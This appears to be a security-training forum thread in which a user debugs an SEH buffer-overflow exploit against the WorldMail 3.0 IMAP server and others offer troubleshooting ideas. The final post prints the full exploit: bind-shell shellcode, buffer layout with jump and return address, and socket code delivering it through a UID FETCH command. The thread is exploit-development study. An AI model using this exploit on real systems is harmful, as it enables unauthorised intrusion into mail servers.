Shellcode Executes but Cannot Connect to the victim !

This topic contains 10 replies, has 6 voices, and was last updated by  zaixer 6 years, 4 months ago.

  • Author
    Posts
  • #8503
     zaixer 
    Participant

    Hi all,

    I am trying to exploit an SEH bof on “Eudora Qualcomm WorldMail 3.0 (IMAPd)”. the shellcode is bind_tcp on port 4444. Everything works fine, I removed all bad characters, verified that the code is placed in the right offset, and the code executes and I verify this by running “netstat -noa” on the victim machine which shows that its listening to port 4444 as expected.
    The problem arise when I am trying to connect to this port using netcat. once I connect to the victim, the program crashes in the debugger although it was “Running” without problems just before I connect to it.

    I even tried connecting to it from the victim machine itself to keep off any network problem, however, the same problem happen !

    Thanks in advance !

  • #53192
     hanyhasan 
    Participant

    Hi

    check this write up about worldmail 3.0
    http://www.bnxnet.com/2012/10/01/seh-worldmail-example/

  • #53193
     zaixer 
    Participant

    Thanks Hany,

    Actually I have already reviewed it, however, I doubt that it is working one as the shellcode used contains bad chars like x00 !

  • #53194
     dynamik 
    Participant

    Can you paste your exploit? It’s difficult to provide much guidance without seeing it.

    Try doing a stack adjustment by subtracting something like -1500 from ESP before your shellcode. I’ve had the shellcode get corrupted as it decodes. It might get far enough to open a socket, but the rest is broken.

  • #53195
     the_hutch 
    Participant

    Don’t know why people are asking for exploit code on this one. OP obviously has a working exploit if the payload was executed (as evidenced by the open port 4444). The problem is somewhere in the post-exploitation connection attempt.
    The only thing I can think of is possibly a firewall sitting between you and the remote system that is white-listed (so drops all incoming connections to ports that are not in standard use on the network). Or a hardened host-based firewall, if target is windows system.

  • #53196
     superkojiman 
    Participant

    Easy way to check if it’s something else blocking the exploit – setup a netcat listener on port 4444 on your victim machine. Then try connecting to it with netcat on your attacking machine. If it gets dropped, then there’s something sitting in between preventing it from connecting.

    If that works, then you need to examine the debugger closer. Do you know what’s causing it to crash? Maybe one of the functions being called when you attempt to connect is returning an error?

  • #53197
     hayabusa 
    Participant

    @the_hutch

    I think you over-read the intent, in dynamik’s response.

    (Note, the OP said the listener crashed on a connection attempt. Not that it just didn’t respond)

    The reason dynamik asked is because, very obviously, while the exploit opened the listener, it has issues with what to do with a connection attempt. I don’t think he’s actually asking for the code, specific to the exploit, itself, but rather the payload portion of the exploit, where the execution occurs ‘POST’ exploit. Obviously, either a.) the payload is flawed, or b.) something corrupted the payload, in memory (or it didn’t fit in memory), to the point where anything connecting to the listener causes it to crash, or c.) the payload code is making a call to a bad address.

    And I also agree with superkojiman, who posted, as I was typing… 😉

  • #53198
     the_hutch 
    Participant

    You’re right…my bad. Jumped the gun on that one…

  • #53199
     hayabusa 
    Participant

    @the_hutch wrote:

    You’re right…my bad. Jumped the gun on that one…

    No worries. I do it from time to time, too. (Much more often than I’d like to admit, sometimes.) It helps that many of us here have known dynamik (aka – ajohnson) for a couple of years now, so I pretty much knew where he was coming from (as well as recently having the privilege to meet him, face to face, for the first time – great guy)

  • #53200
     the_hutch 
    Participant

    Yeah….as the new guy around here, I should probably at least read the entire post before firing back replies and stepping on peoples toes, lol.

  • #53201
     zaixer 
    Participant

    @dynamik thanks for your response. For some reason it worked after adding some NOPs after the shellcode ! please check the code below:

    ====================================================================================================================
    shellcode = (“xb8x3bxe5xd0x36xdaxd3xd9x74x24xf4x5ax29xc9xb1”
    “x56x31x42x13x83xc2x04x03x42x34x07x25xcaxa2x4e”
    “xc6x33x32x31x4exd6x03x63x34x92x31xb3x3exf6xb9”
    “x38x12xe3x4ax4cxbbx04xfbxfbx9dx2bxfcxcdx21xe7”
    “x3ex4fxdexfax12xafxdfx34x67xaex18x28x87xe2xf1”
    “x26x35x13x75x7ax85x12x59xf0xb5x6cxdcxc7x41xc7”
    “xdfx17xf9x5cx97x8fx72x3ax08xb1x57x58x74xf8xdc”
    “xabx0exfbx34xe2xefxcdx78xa9xd1xe1x75xb3x16xc5”
    “x65xc6x6cx35x18xd1xb6x47xc6x54x2bxefx8dxcfx8f”
    “x11x42x89x44x1dx2fxddx03x02xaex32x38x3ex3bxb5”
    “xefxb6x7fx92x2bx92x24xbbx6ax7ex8bxc4x6dx26x74”
    “x61xe5xc5x61x13xa4x81x46x2ex57x52xc0x39x24x60”
    “x4fx92xa2xc8x18x3cx34x2ex33xf8xaaxd1xbbxf9xe3”
    “x15xefxa9x9bxbcx8fx21x5cx40x5axe5x0cxeex34x46”
    “xfdx4exe4x2ex17x41xdbx4fx18x8bx6ax48xd6xefx3f”
    “x3fx1bx10xaexe3x92xf6xbax0bxf3xa1x52xeex20x7a”
    “xc5x11x03xd6x5ex86x1bx30x58xa9x9bx16xcbx06x33”
    “xf1x9fx44x80xe0xa0x40xa0x6bx99x03x3ax02x68xb5”
    “x3bx0fx1ax56xa9xd4xdax11xd2x42x8dx76x24x9bx5b”
    “x6bx1fx35x79x76xf9x7ex39xadx3ax80xc0x20x06xa6”
    “xd2xfcx87xe2x86x50xdexbcx70x17x88x0ex2axc1x67”
    “xd9xbax94x4bxdaxbcx98x81xacx20x28x7cxe9x5fx85”
    “xe8xfdx18xfbx88x02xf3xbfxb7xf3xc9x55x2fxaaxb8”
    “x17x2dx4dx17x5bx48xcex9dx24xafxcexd4x21xebx48”
    “x05x58x64x3dx29xcfx85x14”)

    buffer = “x90” * 300 #Nop Sled to fill the first 300 bytes before the shellcode
    buffer += shellcode #Shellcode to spawn a shell listening on port 4444
    buffer += “x90” *81 #Nop Sled to fill the rest of the buffer after the shellcode
    buffer += “xEBx06x90x90” #Short JMP of 6 bytes
    buffer += “x95xcbx0dx60” #Memory Address of POP POP RETN sequence at module MsccMgr.dll
    buffer += “x90″*8+”xe9xffxfcxffxff” #8 Bytes of NOPs followed by 700 Bytes backward jump
    buffer += “}” *50 #Junk

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
    s.connect((sys.argv[1],int(sys.argv[2])))
    except:
    print “Can’t connect to server!n”
    sys.exit(0)

    print “[+] Connecting to victim !”
    data=s.recv(1024)
    print “[+] “+data.rstrip()
    print “[+] Sending evil buffer…”
    s.send(‘A013 UID FETCH 4827313:4827313 ‘+ buffer + “rn”)
    s.close()
    print “[+] Exploitation Successfuln”
    print “[+] Please Connect to port 4444 on victim IP now !n”
    ==================================================================================================================
    So when moving the 81 NOPs that are after the shellcode and placing them before the shellcode (adding them to the 300 NOPs already there), the exploit fails !

    Actually I would appreciate letting me know what is know by stack adjustment !

    @superkojiman I am connecting to it from local machine itself: nc 127.0.0.1 444 to avoid any network problems

You must be logged in to reply to this topic.

Copyright ©2019 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?